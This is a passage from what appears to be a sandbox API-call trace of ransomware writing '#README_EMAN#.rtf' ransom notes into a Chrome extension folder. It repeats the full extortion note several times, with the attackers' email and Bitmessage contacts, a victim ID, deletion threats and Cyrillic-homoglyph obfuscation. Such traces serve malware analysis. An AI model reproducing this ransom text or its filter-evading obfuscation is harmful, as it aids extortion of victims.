t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.182] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.182] CloseHandle (hObject=0x294) returned 1 [0278.183] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0278.183] GetLastError () returned 0x2 [0278.183] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 